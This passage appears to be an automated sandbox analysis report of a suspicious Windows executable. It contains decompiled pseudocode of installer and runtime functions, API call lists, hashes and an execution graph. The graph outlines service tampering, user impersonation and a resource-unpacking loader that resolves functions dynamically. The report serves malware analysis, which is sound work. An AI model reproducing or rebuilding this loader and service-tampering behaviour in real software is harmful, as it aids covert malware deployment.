                                                                        						E00F81680(_t24, _t28 - _t19 + 1, _t33);
                                                                        						_t11 =  *0xf891e0; // 0x33d7bf0
                                                                        						 *(_t34 + 4) = _t11;
                                                                        						 *0xf891e0 = _t34;
                                                                        						return 1;
                                                                        					}
                                                                        					_t25 =  *0xf88584; // 0x0
                                                                        					E00F844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                        					LocalFree(_t34);
                                                                        					L2:
                                                                        					return 0;
                                                                        				}
                                                                        				_t26 =  *0xf88584; // 0x0
                                                                        				E00F844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                        				goto L2;
                                                                        			}















                                                                        0x00f847e8
                                                                        0x00f847f0
                                                                        0x00f847f4
                                                                        0x00f8480f
                                                                        0x00f84811
                                                                        0x00f84814
                                                                        0x00f84814
                                                                        0x00f84816
                                                                        0x00f84817
                                                                        0x00f84829
                                                                        0x00f8482b
                                                                        0x00f8482f
                                                                        0x00f8484f
                                                                        0x00f84852
                                                                        0x00f84855
                                                                        0x00f84855
                                                                        0x00f84857
                                                                        0x00f84858
                                                                        0x00f84860
                                                                        0x00f84865
                                                                        0x00f8486a
                                                                        0x00f8486f
                                                                        0x00000000
                                                                        0x00f84876
                                                                        0x00f84831
                                                                        0x00f84841
                                                                        0x00f84847
                                                                        0x00f8480b
                                                                        0x00000000
                                                                        0x00f8480b
                                                                        0x00f847f6
                                                                        0x00f84806
                                                                        0x00000000

                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00F84E6F), ref: 00F847EA
                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00F84823
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00F84847
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F84851
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 359063898-3217841213
                                                                        • Opcode ID: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                        • Instruction ID: d2b55955bc15a6e7ea0e2654f7c4de75b5bb33b86ecad95187507d65248e06c2
                                                                        • Opcode Fuzzy Hash: c190e038688333596cac6fbab27dacc48fc0c49509f4fcdaf9f0375e561d1ef5
                                                                        • Instruction Fuzzy Hash: BB11E975604A42AFE714AF249C18FF73B5AEB85750F048519FD829B341DB39AC06A760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F83680(void* __ecx) {
                                                                        				void* _v8;
                                                                        				struct tagMSG _v36;
                                                                        				int _t8;
                                                                        				struct HWND__* _t16;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t16 = 0;
                                                                        				while(1) {
                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                        					if(_t8 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						do {
                                                                        							if(_v36.message != 0x12) {
                                                                        								DispatchMessageA( &_v36);
                                                                        							} else {
                                                                        								_t16 = 1;
                                                                        							}
                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                        						} while (_t8 != 0);
                                                                        						if(_t16 == 0) {
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				return _t8;
                                                                        			}







                                                                        0x00f8368c
                                                                        0x00f8368f
                                                                        0x00f83691
                                                                        0x00f8369f
                                                                        0x00f836a7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f836ba
                                                                        0x00000000
                                                                        0x00f836bc
                                                                        0x00f836bc
                                                                        0x00f836c0
                                                                        0x00f836cb
                                                                        0x00f836c2
                                                                        0x00f836c4
                                                                        0x00f836c4
                                                                        0x00f836da
                                                                        0x00f836e0
                                                                        0x00f836e6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f836e6
                                                                        0x00000000
                                                                        0x00f836ba
                                                                        0x00f836ed

                                                                        APIs
                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00F8369F
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836B2
                                                                        • DispatchMessageA.USER32(?), ref: 00F836CB
                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00F836DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                        • String ID:
                                                                        • API String ID: 2776232527-0
                                                                        • Opcode ID: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                        • Instruction ID: 08420924679f50936865472e67414d024ad850c8cd23b359424f5f36ee18f569
                                                                        • Opcode Fuzzy Hash: 832eaf69142da6d810ebc03950e016d223c3909ef33070e75cf7afd06e772c1b
                                                                        • Instruction Fuzzy Hash: 7A01A772D0021877DB305BAA9C4CEEB777CEBC5F20F10012AFE05E2294E561C640EB61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E00F86517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0xf89a3c; // 0xf80000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E00F844B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t24 = _a16;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}







                                                                        0x00f8651f
                                                                        0x00f8652a
                                                                        0x00f86534
                                                                        0x00f8656b
                                                                        0x00f86577
                                                                        0x00f8657c
                                                                        0x00f86536
                                                                        0x00f8653e
                                                                        0x00f86542
                                                                        0x00000000
                                                                        0x00f86544
                                                                        0x00f86547
                                                                        0x00f8654c
                                                                        0x00f86549
                                                                        0x00f86549
                                                                        0x00f86549
                                                                        0x00f8655e
                                                                        0x00f86560
                                                                        0x00f86569
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f86569
                                                                        0x00f86542
                                                                        0x00f86587

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                        • LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                        • DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                        • FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID:
                                                                        • API String ID: 1214682469-0
                                                                        • Opcode ID: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                        • Instruction ID: 038db0188b6b6ecfeb8200b909a4f3424ee9bf7b758b181cf6235dbd9acd4c24
                                                                        • Opcode Fuzzy Hash: c8bcdb0e43b1f7c0add6ed61c70baafe9e144c3ee17388a5bc395fcf375bc0be
                                                                        • Instruction Fuzzy Hash: DB012672500609BBDB106FA99C08EFB7B6DEB85770F08012AFE00E7190D7758C10BBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E00F865E8(char* __ecx) {
                                                                        				char _t3;
                                                                        				char _t10;
                                                                        				char* _t12;
                                                                        				char* _t14;
                                                                        				char* _t15;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t12 = __ecx;
                                                                        				_t15 = __ecx;
                                                                        				_t14 =  &(__ecx[1]);
                                                                        				_t10 = 0;
                                                                        				do {
                                                                        					_t3 =  *_t12;
                                                                        					_t12 =  &(_t12[1]);
                                                                        				} while (_t3 != 0);
                                                                        				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                        				while(1) {
                                                                        					_t16 = CharPrevA(_t15, ??);
                                                                        					if(_t16 <= _t15) {
                                                                        						break;
                                                                        					}
                                                                        					if( *_t16 == 0x5c) {
                                                                        						L7:
                                                                        						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                        							_t16 = CharNextA(_t16);
                                                                        						}
                                                                        						 *_t16 = _t10;
                                                                        						_t10 = 1;
                                                                        					} else {
                                                                        						_push(_t16);
                                                                        						continue;
                                                                        					}
                                                                        					L11:
                                                                        					return _t10;
                                                                        				}
                                                                        				if( *_t16 == 0x5c) {
                                                                        					goto L7;
                                                                        				}
                                                                        				goto L11;
                                                                        			}









                                                                        0x00f865e8
                                                                        0x00f865ed
                                                                        0x00f865ef
                                                                        0x00f865f2
                                                                        0x00f865f4
                                                                        0x00f865f4
                                                                        0x00f865f6
                                                                        0x00f865f7
                                                                        0x00f86608
                                                                        0x00f86611
                                                                        0x00f86618
                                                                        0x00f8661c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8660e
                                                                        0x00f86623
                                                                        0x00f86625
                                                                        0x00f8663b
                                                                        0x00f8663b
                                                                        0x00f8663d
                                                                        0x00f86641
                                                                        0x00f86610
                                                                        0x00f86610
                                                                        0x00000000
                                                                        0x00f86610
                                                                        0x00f86644
                                                                        0x00f86647
                                                                        0x00f86647
                                                                        0x00f86621
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00F82B33), ref: 00F86602
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F86612
                                                                        • CharPrevA.USER32(?,00000000), ref: 00F86629
                                                                        • CharNextA.USER32(00000000), ref: 00F86635
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Prev$Next
                                                                        • String ID:
                                                                        • API String ID: 3260447230-0
                                                                        • Opcode ID: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                        • Instruction ID: 299e924a534fcbca7eb75718cccfd759b86cc50cca99043f17e5d2ca433e4bf5
                                                                        • Opcode Fuzzy Hash: 95a30be76d7a37c4ae2dcc1a5f5bc2b1f06fb563fe469f0a4508d274fa917753
                                                                        • Instruction Fuzzy Hash: 45F028328045D06EE7322B288CCC9FBBF9CCF87374B2901AFE491D6001E6150D06AB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F869B0() {
                                                                        				intOrPtr* _t4;
                                                                        				intOrPtr* _t5;
                                                                        				void* _t6;
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t12;
                                                                        
                                                                        				 *0xf881f8 = E00F86C70();
                                                                        				__set_app_type(E00F86FBE(2));
                                                                        				 *0xf888a4 =  *0xf888a4 | 0xffffffff;
                                                                        				 *0xf888a8 =  *0xf888a8 | 0xffffffff;
                                                                        				_t4 = __p__fmode();
                                                                        				_t11 =  *0xf88528; // 0x0
                                                                        				 *_t4 = _t11;
                                                                        				_t5 = __p__commode();
                                                                        				_t12 =  *0xf8851c; // 0x0
                                                                        				 *_t5 = _t12;
                                                                        				_t6 = E00F87000();
                                                                        				if( *0xf88000 == 0) {
                                                                        					__setusermatherr(E00F87000);
                                                                        				}
                                                                        				E00F871EF(_t6);
                                                                        				return 0;
                                                                        			}








                                                                        0x00f869b7
                                                                        0x00f869c2
                                                                        0x00f869c8
                                                                        0x00f869cf
                                                                        0x00f869d8
                                                                        0x00f869de
                                                                        0x00f869e4
                                                                        0x00f869e6
                                                                        0x00f869ec
                                                                        0x00f869f2
                                                                        0x00f869f4
                                                                        0x00f86a00
                                                                        0x00f86a07
                                                                        0x00f86a0d
                                                                        0x00f86a0e
                                                                        0x00f86a15

                                                                        APIs
                                                                          • Part of subcall function 00F86FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00F86FC5
                                                                        • __set_app_type.MSVCRT ref: 00F869C2
                                                                        • __p__fmode.MSVCRT ref: 00F869D8
                                                                        • __p__commode.MSVCRT ref: 00F869E6
                                                                        • __setusermatherr.MSVCRT ref: 00F86A07
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                        • String ID:
                                                                        • API String ID: 1632413811-0
                                                                        • Opcode ID: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                        • Instruction ID: f50726348e5ae571c8d528ac3aaccc42d652a483433e80a023c1e25af142567b
                                                                        • Opcode Fuzzy Hash: 403a9108639fcebffffdcf7a6fa3cd8571ea49ab9ad0cb62caf12369bba4c551
                                                                        • Instruction Fuzzy Hash: BAF098745093098FDB68BB34BD0E6E43B61FB05371B60061AE461862E5CF3ED546BB16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:5.7%
                                                                        Dynamic/Decrypted Code Coverage:8.3%
                                                                        Signature Coverage:5%
                                                                        Total number of Nodes:1254
                                                                        Total number of Limit Nodes:45
                                                                        execution_graph 13829 2020980 13830 2020989 13829->13830 13832 2024a25 13829->13832 13835 20290d0 13832->13835 13837 20290e3 13835->13837 13839 2029180 13837->13839 13840 20291c8 VirtualProtect 13839->13840 13842 2024a47 13840->13842 13843 2029920 13844 202996b OpenSCManagerW 13843->13844 13846 20299b4 13844->13846 13847 202a1a8 13849 202a226 ChangeServiceConfigA 13847->13849 13850 202a4b2 13849->13850 13851 20296a8 13854 2029701 GetUserNameA 13851->13854 13853 2029806 13854->13853 13855 202a0e8 13856 202a130 ControlService 13855->13856 13857 202a167 13856->13857 13858 20299e8 13859 2029a3d OpenServiceA 13858->13859 13861 2029ad4 13859->13861 13862 2029ed8 13863 2029f19 ImpersonateLoggedOnUser 13862->13863 13864 2029f46 13863->13864 13865 40cbdd 13866 40cbe9 ___lock_fhandle 13865->13866 13900 40d534 HeapCreate 13866->13900 13871 40cc46 13902 41087e GetModuleHandleW 13871->13902 13873 40cc57 __RTC_Initialize 13936 411a15 13873->13936 13874 40cbb4 _fast_error_exit 63 API calls 13874->13873 13876 40cc66 13877 40cc72 GetCommandLineA 13876->13877 14073 40e79a 13876->14073 13951 412892 13877->13951 13884 40cc97 13987 41255f 13884->13987 13885 40e79a __amsg_exit 63 API calls 13885->13884 13888 40cca8 14002 40e859 13888->14002 13889 40e79a __amsg_exit 63 API calls 13889->13888 13891 40ccb0 13892 40ccbb 13891->13892 13893 40e79a __amsg_exit 63 API calls 13891->13893 14008 4019f0 OleInitialize 13892->14008 13893->13892 13895 40ccd8 13896 40ccea 13895->13896 14062 40ea0a 13895->14062 14080 40ea36 13896->14080 13899 40ccef ___lock_fhandle 13901 40cc3a 13900->13901 13901->13871 14065 40cbb4 13901->14065 13903 410892 13902->13903 13904 410899 13902->13904 14083 40e76a 13903->14083 13906 410a01 13904->13906 13907 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 13904->13907 14142 410598 13906->14142 13910 4108ec TlsAlloc 13907->13910 13912 40cc4c 13910->13912 13913 41093a TlsSetValue 13910->13913 13912->13873 13912->13874 13913->13912 13914 41094b 13913->13914 14087 40ea54 13914->14087 13919 41046e __encode_pointer 6 API calls 13920 41096b 13919->13920 13921 41046e __encode_pointer 6 API calls 13920->13921 13922 41097b 13921->13922 13923 41046e __encode_pointer 6 API calls 13922->13923 13924 41098b 13923->13924 14104 40d564 13924->14104 13931 4104e9 __decode_pointer 6 API calls 13932 4109df 13931->13932 13932->13906 13933 4109e6 13932->13933 14124 4105d5 13933->14124 13935 4109ee GetCurrentThreadId 13935->13912 14449 40e1d8 13936->14449 13938 411a21 GetStartupInfoA 13939 411cba __calloc_crt 63 API calls 13938->13939 13945 411a42 13939->13945 13940 411c60 ___lock_fhandle 13940->13876 13941 411bdd GetStdHandle 13946 411ba7 13941->13946 13942 411c42 SetHandleCount 13942->13940 13943 411cba __calloc_crt 63 API calls 13943->13945 13944 411bef GetFileType 13944->13946 13945->13940 13945->13943 13945->13946 13948 411b2a 13945->13948 13946->13940 13946->13941 13946->13942 13946->13944 13949 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 13946->13949 13947 411b53 GetFileType 13947->13948 13948->13940 13948->13946 13948->13947 13950 41389c ___lock_fhandle InitializeCriticalSectionAndSpinCount 13948->13950 13949->13946 13950->13948 13952 4128b0 GetEnvironmentStringsW 13951->13952 13953 4128cf 13951->13953 13954 4128c4 GetLastError 13952->13954 13955 4128b8 13952->13955 13953->13955 13956 412968 13953->13956 13954->13953 13957 4128eb GetEnvironmentStringsW 13955->13957 13958 4128fa WideCharToMultiByte 13955->13958 13959 412971 GetEnvironmentStrings 13956->13959 13960 40cc82 13956->13960 13957->13958 13957->13960 13963 41295d FreeEnvironmentStringsW 13958->13963 13964 41292e 13958->13964 13959->13960 13961 412981 13959->13961 13976 4127d7 13960->13976 13965 411c75 __malloc_crt 63 API calls 13961->13965 13963->13960 13966 411c75 __malloc_crt 63 API calls 13964->13966 13967 41299b 13965->13967 13968 412934 13966->13968 13969 4129a2 FreeEnvironmentStringsA 13967->13969 13970 4129ae _realloc 13967->13970 13968->13963 13971 41293c WideCharToMultiByte 13968->13971 13969->13960 13974 4129b8 FreeEnvironmentStringsA 13970->13974 13972 412956 13971->13972 13973 41294e 13971->13973 13972->13963 13975 40b6b5 __crtGetStringTypeA_stat 63 API calls 13973->13975 13974->13960 13975->13972 13977 4127f1 GetModuleFileNameA 13976->13977 13978 4127ec 13976->13978 13980 412818 13977->13980 14456 41446b 13978->14456 14450 41263d 13980->14450 13982 40cc8c 13982->13884 13982->13885 13984 411c75 __malloc_crt 63 API calls 13985 41285a 13984->13985 13985->13982 13986 41263d _parse_cmdline 73 API calls 13985->13986 13986->13982 13988 412568 13987->13988 13991 41256d _strlen 13987->13991 13989 41446b ___initmbctable 107 API calls 13988->13989 13989->13991 13990 40cc9d 13990->13888 13990->13889 13991->13990 13992 411cba __calloc_crt 63 API calls 13991->13992 13997 4125a2 _strlen 13992->13997 13993 412600 13994 40b6b5 __crtGetStringTypeA_stat 63 API calls 13993->13994 13994->13990 13995 411cba __calloc_crt 63 API calls 13995->13997 13996 412626 13998 40b6b5 __crtGetStringTypeA_stat 63 API calls 13996->13998 13997->13990 13997->13993 13997->13995 13997->13996 13999 40ef42 _strcpy_s 63 API calls 13997->13999 14000 4125e7 13997->14000 13998->13990 13999->13997 14000->13997 14001 40e61c __invoke_watson 10 API calls 14000->14001 14001->14000 14004 40e867 __IsNonwritableInCurrentImage 14002->14004 14867 413586 14004->14867 14005 40e885 __initterm_e 14007 40e8a4 __IsNonwritableInCurrentImage __initterm 14005->14007 14871 40d2bd 14005->14871 14007->13891 14009 401ab9 14008->14009 14971 40b99e 14009->14971 14011 401abf 14012 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 14011->14012 14038 402467 14011->14038 14013 401dc3 CloseHandle GetModuleHandleA 14012->14013 14014 401c55 14012->14014 14984 401650 14013->14984 14020 401c9c CloseHandle 14014->14020 14025 401cf9 Module32Next 14014->14025 14016 401e8b FindResourceA LoadResource LockResource SizeofResource 14017 40b84d _malloc 63 API calls 14016->14017 14018 401ebf 14017->14018 14986 40af66 14018->14986 14020->13895 14021 401ecb _memset 14022 401efc SizeofResource 14021->14022 14023 401f1c 14022->14023 14024 401f5f 14022->14024 14023->14024 15024 401560 14023->15024 14027 401f92 _memset 14024->14027 14028 401560 __VEC_memcpy 14024->14028 14025->14013 14034 401d0f 14025->14034 14029 401fa2 FreeResource 14027->14029 14028->14027 14030 40b84d _malloc 63 API calls 14029->14030 14031 401fbb SizeofResource 14030->14031 14032 401fe5 _memset 14031->14032 14033 4020aa LoadLibraryA 14032->14033 14035 401650 14033->14035 14034->14020 14037 401dad Module32Next 14034->14037 14036 40216c GetProcAddress 14035->14036 14036->14038 14039 4021aa 14036->14039 14037->14013 14037->14034 14038->13895 14039->14038 14998 4018f0 14039->14998 14041 40243f 14041->14038 14042 40b6b5 __crtGetStringTypeA_stat 63 API calls 14041->14042 14042->14038 14043 4021f1 14043->14041 15010 401870 14043->15010 14045 402269 VariantInit 14046 401870 76 API calls 14045->14046 14047 40228b VariantInit 14046->14047 14048 4022a7 14047->14048 14049 4022d9 SafeArrayCreate SafeArrayAccessData 14048->14049 15015 40b350 14049->15015 14052 40232c 14053 402354 SafeArrayDestroy 14052->14053 14061 40235b 14052->14061 14053->14061 14054 402392 SafeArrayCreateVector 14055 4023a4 14054->14055 14056 4023bc VariantClear VariantClear 14055->14056 15017 4019a0 14056->15017 14059 40242e 14060 4019a0 66 API calls 14059->14060 14060->14041 14061->14054 15281 40e8de 14062->15281 14064 40ea1b 14064->13896 14066 40cbc2 14065->14066 14067 40cbc7 14065->14067 14068 40ec4d __FF_MSGBANNER 63 API calls 14066->14068 14069 40eaa2 __NMSG_WRITE 63 API calls 14067->14069 14068->14067 14070 40cbcf 14069->14070 14071 40e7ee _malloc 4 API calls 14070->14071 14072 40cbd9 14071->14072 14072->13871 14074 40ec4d __FF_MSGBANNER 63 API calls 14073->14074 14075 40e7a4 14074->14075 14076 40eaa2 __NMSG_WRITE 63 API calls 14075->14076 14077 40e7ac 14076->14077 14078 4104e9 __decode_pointer 6 API calls 14077->14078 14079 40cc71 14078->14079 14079->13877 14081 40e8de _doexit 63 API calls 14080->14081 14082 40ea41 14081->14082 14082->13899 14084 40e775 Sleep GetModuleHandleW 14083->14084 14085 40e793 14084->14085 14086 40e797 14084->14086 14085->14084 14085->14086 14086->13904 14148 4104e0 14087->14148 14089 40ea5c __init_pointers __initp_misc_winsig 14151 41393d 14089->14151 14092 41046e __encode_pointer 6 API calls 14093 40ea98 14092->14093 14094 41046e TlsGetValue 14093->14094 14095 4104a7 GetModuleHandleW 14094->14095 14096 410486 14094->14096 14098 4104c2 GetProcAddress 14095->14098 14099 4104b7 14095->14099 14096->14095 14097 410490 TlsGetValue 14096->14097 14101 41049b 14097->14101 14103 41049f 14098->14103 14100 40e76a __crt_waiting_on_module_handle 2 API calls 14099->14100 14102 4104bd 14100->14102 14101->14095 14101->14103 14102->14098 14102->14103 14103->13919 14107 40d56f 14104->14107 14106 40d59d 14106->13906 14108 4104e9 TlsGetValue 14106->14108 14107->14106 14154 41389c 14107->14154 14109 410501 14108->14109 14110 410522 GetModuleHandleW 14108->14110 14109->14110 14113 41050b TlsGetValue 14109->14113 14111 410532 14110->14111 14112 41053d GetProcAddress 14110->14112 14114 40e76a __crt_waiting_on_module_handle 2 API calls 14111->14114 14115 41051a 14112->14115 14117 410516 14113->14117 14116 410538 14114->14116 14115->13906 14118 411cba 14115->14118 14116->14112 14116->14115 14117->14110 14117->14115 14119 411cc3 14118->14119 14121 4109c5 14119->14121 14122 411ce1 Sleep 14119->14122 14159 40e231 14119->14159 14121->13906 14121->13931 14123 411cf6 14122->14123 14123->14119 14123->14121 14428 40e1d8 14124->14428 14126 4105e1 GetModuleHandleW 14127 4105f1 14126->14127 14128 4105f7 14126->14128 14129 40e76a __crt_waiting_on_module_handle 2 API calls 14127->14129 14130 410633 14128->14130 14131 41060f GetProcAddress GetProcAddress 14128->14131 14129->14128 14132 40d6e0 __lock 59 API calls 14130->14132 14131->14130 14133 410652 InterlockedIncrement 14132->14133 14429 4106aa 14133->14429 14136 40d6e0 __lock 59 API calls 14137 410673 14136->14137 14432 4145d2 InterlockedIncrement 14137->14432 14139 410691 14444 4106b3 14139->14444 14141 41069e ___lock_fhandle 14141->13935 14143 4105a2 14142->14143 14147 4105ae 14142->14147 14144 4104e9 __decode_pointer 6 API calls 14143->14144 14144->14147 14145 4105d0 14145->14145 14146 4105c2 TlsFree 14146->14145 14147->14145 14147->14146 14149 41046e __encode_pointer 6 API calls 14148->14149 14150 4104e7 14149->14150 14150->14089 14152 41046e __encode_pointer 6 API calls 14151->14152 14153 40ea8e 14152->14153 14153->14092 14158 40e1d8 14154->14158 14156 4138a8 InitializeCriticalSectionAndSpinCount 14157 4138ec ___lock_fhandle 14156->14157 14157->14107 14158->14156 14160 40e23d ___lock_fhandle 14159->14160 14161 40e255 14160->14161 14169 40e274 _memset 14160->14169 14172 40bfc1 14161->14172 14165 40e2e6 RtlAllocateHeap 14165->14169 14168 40e26a ___lock_fhandle 14168->14119 14169->14165 14169->14168 14178 40d6e0 14169->14178 14185 40def2 14169->14185 14191 40e32d 14169->14191 14194 40d2e3 14169->14194 14197 4106bc GetLastError 14172->14197 14174 40bfc6 14175 40e744 14174->14175 14176 4104e9 __decode_pointer 6 API calls 14175->14176 14177 40e754 __invoke_watson 14176->14177 14179 40d6f5 14178->14179 14180 40d708 EnterCriticalSection 14178->14180 14222 40d61d 14179->14222 14180->14169 14182 40d6fb 14182->14180 14183 40e79a __amsg_exit 62 API calls 14182->14183 14184 40d707 14183->14184 14184->14180 14186 40df20 14185->14186 14189 40dfc2 14186->14189 14190 40dfb9 14186->14190 14416 40da59 14186->14416 14189->14169 14190->14189 14423 40db09 14190->14423 14427 40d606 